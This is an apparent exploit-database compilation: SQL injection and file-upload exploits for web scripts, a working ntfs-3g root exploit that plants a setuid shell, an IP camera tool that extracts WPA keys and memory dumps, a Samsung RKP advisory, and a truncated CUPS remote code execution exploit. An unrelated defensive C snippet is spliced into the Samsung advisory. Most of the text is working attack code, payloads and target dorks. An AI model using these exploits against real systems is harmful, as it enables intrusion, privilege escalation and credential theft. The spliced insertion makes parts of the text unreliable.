# # # # # 
# Exploit Title: Itech Inventory Management Software v3.77 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/inventory-management-software/
# Demo: http://inventory.itechscripts.com/
# Version: 3.77
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as employee user
# http://localhost/[PATH]/notice-edit.php?aid=[SQL]
# E.t.c...
# # # # #
            
# # # # # 
# Exploit Title: AlstraSoft Video Share Enterprise v4.72 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/videoshare.htm
# Demo: http://www.alstrahost.com/vs/
# Version: 4.72
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/album.php?UID=[SQL]
# http://localhost/[PATH]/uprofile.php?UID=[SQL]
# http://localhost/[PATH]/gmembers.php?urlkey=[URLKEY]&gid=[SQL]
# http://localhost/[PATH]/channel_detail.php?chid=[SQL]
# # # # #
            
# # # # # 
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/efriends.htm
# Demo: http://alstrahost.com/friends/
# Version: 5.12
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
# # # # #
            
# # # # # 
# Exploit Title: Alstrasoft ProTaxi Enterprise v3.5 Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/protaxi-uber-clone.htm
# Demo: http://propertycarrots.com/taxi/public/user/signin
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# Register as a passenger member.
# http://localhost/[PATH]/public/user/signup
# My Profile upload photo.php
# http://localhost/[PATH]/public/user/profile
# Right click on the photo to find the .php path.
# http://localhost/[PATH]/public/uploads/....php
# If you upload pictures again .php is deleted.
# # # # #
            
# # # # # 
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
# Demo: http://blizsoft.com/enterprise/
# Version: 5.17
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
# Authentication Bypass :
# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
            
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @"
echo "@  ntfs-3g local privilege escalation to root     @"
echo "@  Credits to Google Project Zero                 @"
echo "@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @"
echo "@  Tested: Debian 9 (Stretch)                     @"
echo "@  Date: 2017-02-03                               @"
echo "@  Link: https://goo.gl/A9I8Vq                    @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "

cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>

MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358@gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");

int init_module(void) {
  printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
  char *envp[] = { "HOME=/tmp", NULL };
  char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
  char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
  call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
  return 0;
}

void cleanup_module(void) {
  printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF

cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF

make 1>/dev/null 2>/dev/null || echo "[-] FAILED: you need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t

echo << 'EOF'

$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@  CVE-2017-0359, PoC by Kristian Erik Hermansen  @
@  ntfs-3g local privilege escalation to root     @
@  Credits to Google Project Zero                 @
@  Affects: Debian 9/8/7, Ubuntu, Gentoo, others  @
@  Tested: Debian 9 (Stretch)                     @
@  Date: 2017-02-03                               @
@  Link: https://goo.gl/A9I8Vq                    @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ... 
[*] Building kernel module ... 
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF
            
Source: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

=== FOXMOLE - Security Advisory 2016-07-05 ===

Zoneminder multiple vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected Versions
=================
Zoneminder 1.29,1.30

Issue Overview
==============
Vulnerability Type: SQL Injection, Cross Site Scripting, Session Fixation, No CSRF Protection
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: Zoneminder
Vendor URL: https://zoneminder.com/
Credits: FOXMOLE employee Tim Herres
Advisory URL: https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
Advisory Status: Public
CVE-Number: NA
CVE URL: NA
OVE-ID: 
OVI-ID: 
CWE-ID: CWE-89
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)


Impact
======
During an internal code review multiple vulnerabilities were identified.
The whole application misses input validation and output encoding.
This means user supplied input is inserted in an unsafe way.
This could allow a remote attacker to easily compromise user accounts or access the database in an unsafe way.

Issue Description
=================
The following findings are only examples; there are quite a few more. The whole application should be reviewed.

All items tested using Firefox

1)Cross Site Scripting (XSS)
Reflected: http://192.168.241.131/zm/index.php?view=request&request=log&task=download&key=a9fef1f4&format=texty9fke%27%3Chtml%3E%3Chead%3E%3C/head%3E%3Cbody%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C/body%3E%3C/html%3Eayn2h
Reflected without authentication: http://192.168.241.131/zm/index.php/LSE4%22%3E%3Cscript%3Ealert(1)%3C/script%3ELSE
Stored: Creating a new monitor using the name "Bla<script>alert(1)</script>". There is only a clientside protection.

2)SQL Injection
Example Url:http://192.168.241.131/zm/index.php
Parameter: limit (POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: view=request&request=log&task=query&limit=100;(SELECT *
FROM (SELECT(SLEEP(5)))OQkj)#&minTime=1466674406.084434
Easily exploitable using sqlmap.

3)Session Fixation
After a successful authentication the Session Cookie ZMSESSID remains the same.
Example: Cookie before the login = ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2 after successful login
ZMSESSID=26ga0i62e4e51mhfcb68nk3dg2

4)No CSRF Protection
A possible CSRF attack form, which changes the password of the admin (uid=1), if the corresponding user activates it.
<html>
  <body>
    <form action="http://192.168.241.131/zm/index.php" method="POST">
      <input type="hidden" name="view" value="user" />
      <input type="hidden" name="action" value="user" />
      <input type="hidden" name="uid" value="1" />
      <input type="hidden" name="newUser&#91;MonitorIds&#93;" value="" />
      <input type="hidden" name="newUser&#91;Username&#93;" value="admin" />
      <input type="hidden" name="newUser&#91;Password&#93;"
value="admin1" />
      <input type="hidden" name="conf&#95;password" value="admin1" />
      <input type="hidden" name="newUser&#91;Language&#93;" value="" />
      <input type="hidden" name="newUser&#91;Enabled&#93;" value="1" />
      <input type="hidden" name="newUser&#91;Stream&#93;" value="View" />
      <input type="hidden" name="newUser&#91;Events&#93;" value="Edit" />
      <input type="hidden" name="newUser&#91;Control&#93;" value="Edit" />
      <input type="hidden" name="newUser&#91;Monitors&#93;" value="Edit" />
      <input type="hidden" name="newUser&#91;Groups&#93;" value="Edit" />
      <input type="hidden" name="newUser&#91;System&#93;" value="Edit" />
      <input type="hidden" name="newUser&#91;MaxBandwidth&#93;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



Temporary Workaround and Fix
============================
FOXMOLE advises to disable Zoneminder until the vendor publishes a complete fix.



History
=======
2016-07-05  Issue discovered
2016-11-22  Vendor contacted, no response
2016-12-16  Vendor contacted again, still no response
2017-01-17  Vendor contacted --> working on a patch
2017-01-22  Vendor contacted, asked for an update and
            declare advisory release to 2017-02-02 --> no response
2017-02-02  Advisory Release


GPG Signature
=============
This advisory is signed with the GPG key of the FOXMOLE advisories team.
The key can be downloaded here: https://www.foxmole.com/advisories-key-3812092199E3277C.asc


            
# Exploit Title :  Itech Multi Vendor Script - Multiple SQL Injections
# Author 		:  Yunus YILDIRIM (Th3GundY)
# Team 			:  CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
# Website 		:  http://www.yunus.ninja
# Contact 		:  yunusyildirim@protonmail.com

# Vendor Homepage : http://itechscripts.com/
# Software Link   : http://itechscripts.com/multi-vendor-shopping-script/
# Vuln. Version	  : 6.49
# Demo			  : http://multi-vendor.itechscripts.com


# # # #  DETAILS  # # # # 

SQL Injections :

# 1
http://localhost/quickview.php?id=10
	Parameter: id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: id=10 AND 9776=9776

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: id=10 AND SLEEP(5)

# 2
http://localhost/product.php?id=9
	Parameter: id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: id=9 AND 9693=9693

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: id=9 AND SLEEP(5)

# 3
http://localhost/product_search.php?search=Adidas
	Parameter: search (GET)
	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: search=Adidas%' AND SLEEP(5) AND '%'='

# 4
http://localhost/product_search.php?category_id=1
	Parameter: category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1 AND 8225=8225

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1 AND SLEEP(5)

# 5
http://localhost/product_search.php?category_id=1&sub_category_id=1&sub_sub_category_id=1
	Parameter: sub_sub_category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND 7485=7485

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1&sub_category_id=1&sub_sub_category_id=1 AND SLEEP(5)

# 6
http://localhost/product_search.php?category_id=1&sub_category_id=1
	Parameter: sub_category_id (GET)
	    Type: boolean-based blind
	    Title: AND boolean-based blind - WHERE or HAVING clause
	    Payload: category_id=1&sub_category_id=1 AND 5242=5242

	    Type: AND/OR time-based blind
	    Title: MySQL >= 5.0.12 AND time-based blind
	    Payload: category_id=1&sub_category_id=1 AND SLEEP(5)
            
#!/usr/bin/python2.7
##
## spiritnull(at)sigaint.org
##
## Run the exploit against the victim to get WIFI password
## If the victim is vulnerable to memory leak it will try to extract the username and password for the weblogin
##
## magic for you bash:
## wget -qO- http://[HOST]:[PORT]//proc/kcore | strings
## wget -qO- http://[HOST]:[PORT]//etc/RT2870STA.dat
## wget -qO- http://[HOST]:[PORT]//dev/rom0
## wget -qO- http://[HOST]:[PORT]/get_status.cgi
##
## shodan dork:
## "Server: Netwave IP Camera"
##
## zoomeye dork:
## Netwave IP camera http config
##



import sys,os,time,tailer
import urllib2
import subprocess
import signal
from threading import Thread

try:
	if sys.argv[1] == "-h" or sys.argv[1] == "--help":
		print "Usage: python pownetwave.py [HOST]:[PORT]"
		print "Example: python pownetwave.py 127.0.0.1:81"
		sys.exit(0)

	else:
		pass
except IndexError:
	print "Usage: python pownetwave.py [HOST]:[PORT]"
	print "Example: python pownetwave.py 127.0.0.1:81"
	sys.exit(0)

def signal_handler(signal, frame):
	print('\nclearing up..')
	os.system("rm -rf tmpstream.txt")
	os.system("rm -rf tmpstrings.out")
	os.system("killall -9 wget")
	os.system("killall -9 tail")
	sys.exit(0)

signal.signal(signal.SIGINT, signal_handler)

macaddr = ""
done = 0
linecount = 0


class bcolors:
	HEADER = '\033[95m'
	OKBLUE = '\033[94m'
	OKGREEN = '\033[92m'
	WARNING = '\033[93m'
	FAIL = '\033[91m'
	ENDC = '\033[0m'
	BOLD = '\033[1m'
	UNDERLINE = '\033[4m'


print "getting system information.."+sys.argv[1]
response = urllib2.urlopen('http://'+sys.argv[1]+'/get_status.cgi')
xcontent = response.read().split(";\n")
for line in xcontent:
	if line.startswith("var id="):
		line = line.split("'")
		macaddr = line[1]
	else:
		pass


print "victims MAC-ADDRESS: "+bcolors.OKGREEN+str(macaddr)+bcolors.ENDC
print "getting wireless information.."


try:
	resp = urllib2.urlopen("http://"+sys.argv[1]+"//etc/RT2870STA.dat")
	xcontent = resp.read().split("\n")
	print "victims wireless information.."
	for line in xcontent:
		if line.startswith("WPAPSK") or line.startswith("SSID"):
			print "\t\t"+bcolors.OKGREEN+str(line)+bcolors.ENDC
		else:
			print "\t\t"+str(line)
except:
	print "wireless lan is disabled.."


print "checking for memory dump vulnerability.."


try:
	urllib2.urlopen('http://'+sys.argv[1]+'//proc/kcore')
except:
	print bcolors.FAIL+"victim isnt vulnerable for a memory leak, exiting.."+bcolors.ENDC
	sys.exit(0)


print "starting to read memory dump.. "+bcolors.WARNING+"this could take a few minutes"+bcolors.ENDC
proc = subprocess.Popen("wget -qO- http://"+sys.argv[1]+"//proc/kcore > tmpstream.txt", shell=True, preexec_fn=os.setsid)
os.system('echo "" >tmpstrings.out')
time.sleep(1)
proc2 = subprocess.Popen("tail -f tmpstream.txt | strings >>tmpstrings.out", shell=True, preexec_fn=os.setsid)
print bcolors.BOLD+"hit CTRL+C to exit.."+bcolors.ENDC


while 1:
	sys.stdout.flush()
	if os.stat('tmpstrings.out').st_size <= 1024:
		sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
	else:
		sys.stdout.flush()
		print "strings in binary data found.. password should be around line 10000"
		for line in tailer.follow(open('tmpstrings.out','r')):
			sys.stdout.flush()
			if done == 0:
				linecount+= 1
				if line == macaddr:
					sys.stdout.flush()
					done = 1
					print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
				else:
					sys.stdout.write(str(linecount)+"\r")
			elif done == 1:
				done = 2
				print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
			elif done == 2:
				done = 3
				print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
			elif done == 3:
				done = 4
				print "possible password: "+bcolors.OKGREEN+line+bcolors.ENDC
			elif done == 4:
				done = 0
				print "following line.. \n\n"+bcolors.OKGREEN+line+bcolors.ENDC
			else:
				pass


signal.pause()
            
Exploit Title: SlimarUSER Management v1.0 – 'id' Parameter SQL Injection
Date: 03.02.2017
Vendor Homepage: http://slimar.org
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

SlimarUSER is a PHP user management system full of features. The system allows website owners to manage their own users with complete login, registration and many other features. It can be used on its own, or integrated into any existing PHP powered website.

Sqlmap command: sqlmap.py -u "http://locahost/userman/inbox.php?p=view&id=7" --cookie="PHPSESSID=de3052c5dbb1d535d423ee1a2dbb076b; id=4; password=%242y%2410%24UuYt6q5GXU5UO37xc3j3GeN2ZM1hHB1sWqsAMs1DXAoeewSH.WYgq" --batch --random-agent --dbms=mysql

Vulnerable Url: http://locahost/userman/inbox.php?p=view&id=[payload]
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=view&id=7' AND 6275=6275 AND 'DFYF'='DFYF

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: p=view&id=7' AND SLEEP(5) AND 'HCUm'='HCUm
---
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=984

As part of Samsung KNOX, Samsung phones include a security hypervisor called RKP (Real-time Kernel Protection), running in EL2. This hypervisor is meant to ensure that the HLOS kernel running in EL1 remains protected from exploits and aims to prevent privilege escalation attacks by "shielding" certain data structures within the hypervisor.

During the initialization of RKP, a special command can be issued by the EL1 kernel in order to mark the RKP read-only page as such in the stage 2 translation table. This command, "rkp_set_init_page_ro" (command code 0x51), has the following approximate high-level logic:

__int64 rkp_set_init_page_ro(struct args* args_buffer)
{
  unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
  if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
  {
    if ( !rkp_s2_page_change_permission(page_pa, 128LL, 0, 0) )// RO, XN
      return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
  }
  else
  {
    rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
  }
  rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
  return rkp_set_pgt_bitmap(page_pa, 0);
}

As we can see above, the function receives an address in the kernel VAS, and converts it to a physical address by adding a constant offset to it (the virt_to_phys offset for the kernel VAS). Then, the function proceeds to mark the resulting physical address as read-only and non-executable in the stage 2 translation table. Finally, the function proceeds to unset the bit in the RKP page-table bitmap corresponding to the given address. This is meant to indicate to EL1 that the address is protected by a stage 2 mapping.

However, the function fails to validate the bounds of the given virtual address (or the resulting physical address). This means that an attacker can supply any arbitrary address and the function will accept it as valid input. Similarly, the implementation of "rkp_set_pgt_bitmap" performs no such validations:

signed __int64 __fastcall rkp_set_pgt_bitmap(__int64 phys_addr, unsigned char set_or_unset)
{
  signed __int64 result;
  unsigned long phys_off = phys_addr - 0x80000000LL;
  unsigned long bitmap_index = (phys_off >> 18) & 0x3FFFFFFFFFFFLL;
  if ( !rkp_pgt_bitmap )
    return 0LL;
  unsigned long bit_offset = (phys_off >> 12) & 0x3F;
  if ( set_or_unset & 0x80 )
  {
    spin_lock(&rkp_bitmap_spinlock);
    *(rkp_pgt_bitmap + 8 * bitmap_index) |= 1LL << bit_offset;
    spin_unlock(&rkp_bitmap_spinlock);
    result = 1LL;
  }
  else
  {
    spin_lock(&rkp_bitmap_spinlock);
    *(rkp_pgt_bitmap + 8 * bitmap_index) &= ~(1LL << bit_offset);
    spin_unlock(&rkp_bitmap_spinlock);
    result = 1LL;
  }
  return result;
}

The RKP page-table bitmap is only 0x20000 bytes large (each bit denotes a 4KB page, resulting in a supported range of at most 0x100000000 bytes). The base physical address for the bitmap is the physical base address of the kernel range, 0x80000000.

This means that if an attacker supplies any virtual address that is converted to a physical address not in the range of 0x80000000-0x180000000, the resulting "bitmap_index" will not be within the bitmap's bounds, causing the function to modify a bit out-of-bounds.

An attacker can use this in order to specifically craft an input virtual address so that the resulting calculated "bitmap_index" will have any arbitrary value, thus resulting in a modification at an arbitrary offset from the base of the page-table bitmap, within the context of RKP.

As the bitmap resides directly before RKP's code, an attacker can trivially use this primitive in order to modify the code or data pages belonging to RKP, thus gaining privilege escalation from EL1 to the context of RKP.
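The bounds check that the advisory says is missing, shown as an added example (not Samsung's code and not the author's): a user-space C model of the bitmap indexing, using the base (0x80000000) and size (0x20000 bytes) stated above. The names `unchecked_word_index`, `pgt_bitmap_update_checked` and `model_bitmap` are hypothetical, and the set/clear flag is simplified to a boolean.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Values stated in the advisory. */
#define PGT_BITMAP_PHYS_BASE 0x80000000ULL /* first physical address covered */
#define PGT_BITMAP_BYTES     0x20000ULL    /* size of the bitmap in bytes */
#define PAGE_SHIFT_4K        12            /* one bit per 4KB page */

/* Derived limits: 0x4000 64-bit words covering 0x80000000-0x180000000. */
#define PGT_BITMAP_WORDS    (PGT_BITMAP_BYTES / 8)
#define PGT_BITMAP_PHYS_END \
    (PGT_BITMAP_PHYS_BASE + ((PGT_BITMAP_BYTES * 8) << PAGE_SHIFT_4K))

/* Stand-in for rkp_pgt_bitmap (hypothetical, user-space only). */
static uint64_t model_bitmap[PGT_BITMAP_WORDS];

/* Same index arithmetic as the decompiled routine, with no validation.
 * Returned only for inspection; it is never used to touch memory here. */
static uint64_t unchecked_word_index(uint64_t phys_addr)
{
    uint64_t phys_off = phys_addr - PGT_BITMAP_PHYS_BASE; /* wraps if below base */
    return (phys_off >> 18) & 0x3FFFFFFFFFFFULL;
}

/* Hardened variant: reject any address the bitmap does not describe
 * before computing the word index and bit offset. */
static bool pgt_bitmap_update_checked(uint64_t phys_addr, bool set)
{
    if (phys_addr < PGT_BITMAP_PHYS_BASE || phys_addr >= PGT_BITMAP_PHYS_END)
        return false;

    uint64_t phys_off = phys_addr - PGT_BITMAP_PHYS_BASE;
    uint64_t word = phys_off >> 18;                      /* 64 pages per word */
    unsigned bit = (unsigned)((phys_off >> PAGE_SHIFT_4K) & 0x3F);

    if (word >= PGT_BITMAP_WORDS) /* defence in depth; implied by the range check */
        return false;

    if (set)
        model_bitmap[word] |= 1ULL << bit;
    else
        model_bitmap[word] &= ~(1ULL << bit);
    return true;
}

int main(void)
{
    /* Constructed sample addresses: two in range, two outside it. */
    const uint64_t samples[] = {
        0x80000000ULL, 0x17FFFF000ULL, 0x180000000ULL, 0x7FFFF000ULL
    };
    for (size_t i = 0; i < sizeof(samples) / sizeof(samples[0]); i++) {
        uint64_t idx = unchecked_word_index(samples[i]);
        printf("pa=0x%llx word=0x%llx (limit 0x%llx) checked=%s\n",
               (unsigned long long)samples[i], (unsigned long long)idx,
               (unsigned long long)PGT_BITMAP_WORDS,
               pgt_bitmap_update_checked(samples[i], false) ? "accepted" : "rejected");
    }
    return 0;
}
```

The same range check belongs on the physical address in "rkp_set_init_page_ro" before it is passed on, since that function forwards the value without validating it.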

I've verified this issue on an SM-G935F device, build version "XXS1APG3". The RKP version present on the device is "RKP4.2_CL7572479".

Proof of concept for the RKP memory corruption in "rkp_set_init_page_ro".

This PoC modifies an instruction within RKP's address space by repeatedly calling "rkp_set_init_page_ro" with faulty input addresses.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41232.zip
            
#!/usr/bin/python
# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
# Google Dork: n/a
# Date: 2/2/17
# Exploit Author: @0x00string
# Vendor Homepage: cups.org
# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
# Version: <2.0.3
# Tested on: Ubuntu 14/15
# CVE : CVE-2015-1158
import os, re, socket, random, time, getopt, sys
from socket import *
from struct import *

def banner():
    print '''
             lol ty google
             0000000000000
          0000000000000000000   00
       00000000000000000000000000000
      0000000000000000000000000000000
    000000000             0000000000
   00000000               0000000000
  0000000                000000000000
 0000000               000000000000000
 000000              000000000  000000
0000000            000000000     000000
000000            000000000      000000
000000          000000000        000000
000000         00000000          000000
000000       000000000           000000
0000000    000000000            0000000
 000000   000000000             000000
 0000000000000000              0000000
  0000000000000               0000000
   00000000000              00000000
   00000000000            000000000
  0000000000000000000000000000000
   00000000000000000000000000000
     000  0000000000000000000
             0000000000000
              @0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2015-1158.py
'''

def usage ():
    print   ("python script.py <args>\n"
            "   -h, --help:             Show this message\n"
            "   -a, --rhost:            Target IP address\n"
            "   -b, --rport:            Target IPP service port\n"
            "   -c, --lib               /path/to/payload.so\n"
            "   -f, --stomp-only        Only stomp the ACL (no postex)\n"
            "\n"
            "Examples:\n"
            "python script.py -a 10.10.10.10 -b 631 -f\n"
            "python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
    exit()

def pretty (t, m):
        if (t is "+"):
                print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
        elif (t is "-"):
                print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
        elif (t is "*"):
                print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
        elif (t is "!"):
                print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",

def createDump (input):
        d, b, h = '', [], []
        u = list(input)
        for e in u:
                h.append(e.encode("hex"))
                if e == '0x0':
                        b.append('0')
                elif 30 > ord(e) or ord(e) > 128:
                        b.append('.')
                elif 30 < ord(e) or ord(e) < 128:
                        b.append(e)

        i = 0
        while i < len(h):
                if (len(h) - i ) >= 16:
                        d += ' '.join(h[i:i+16])
                        d += "         "
                        d += ' '.join(b[i:i+16])
                        d += "\n"
                        i = i + 16
                else:
                        d += ' '.join(h[i:(len(h) - 0 )])
                        pad = len(' '.join(h[i:(len(h) - 0 )]))
                        d += ' ' * (56 - pad)
                        d += ' '.join(b[i:(len(h) - 0 )])
                        d += "\n"
                        i = i + len(h)

        return d

class tcpsock:
    def __init__(self, sock=None):
        if sock is None:
            self.sock = socket(
            AF_INET, SOCK_STREAM)
            self.sock.settimeout(30)
        else:
            self.sock = sock
    def connect(self, host, port):
        self.sock.connect((host, int(port)))
    def tx(self, msg):
        self.sock.send(msg)
    def rx(self):
        tmp  = self.sock.recv(1024)
        msg = ""
        while tmp:
            msg += tmp
            tmp  = self.sock.recv(1024)
        return msg

def txrx (ip, port, proto, txpacket):
    if (proto is "tcp"):
        sock = tcpsock()
    elif (proto is "udp"):
        sock = udpsock()
    else:
        return None
    sock.connect(ip, port)
    sock.tx(txpacket)
    rxpacket = sock.rx()
    return rxpacket

def locatePrinters(rhost, rport="631"):
    request = ( "GET /printers HTTP/1.1\x0d\x0a"
        "Host: " + rhost + ":" + rport + "\x0d\x0a"
        "User-Agent: CUPS/2.0.2\x0d\x0a"
        "Connection: Close\x0d\x0a"
        "\x0d\x0a")
    response = txrx(rhost, int(rport), "tcp", request)
    if response is not None:
        m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
        if m is not None:
            printer = m.group(1)
            pretty("+","printer found: " + printer)
            return printer
        else:
            pretty("-","no printers")
            exit(1)
    else:
        pretty("-","no printers")
        exit(1)

def preparePayload(libpath):
    with open(libpath, 'rb') as f:
        payload = f.read()
    if payload is not None:
        pretty("*","Payload:\n" + createDump(payload))
    else:
        pretty("-","something went wrong")
        usage()
    return payload

def seedTarget(rhost, rport, printer, payload):
    i = random.randint(1,3)
    reqid = str(pack(">i",(i+2)))
    reqid2 = str(pack(">i",(i+3)))
    printer_uri = "ipp://" + rhost + ":" + str(rport) + printer

    create_job_packet = ("\x02\x00"
                         "\x00\x05"+
                         reqid+
                         "\x01"
                         "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
                         "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
                         "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
                         "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
                         "\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
                         "\x02"
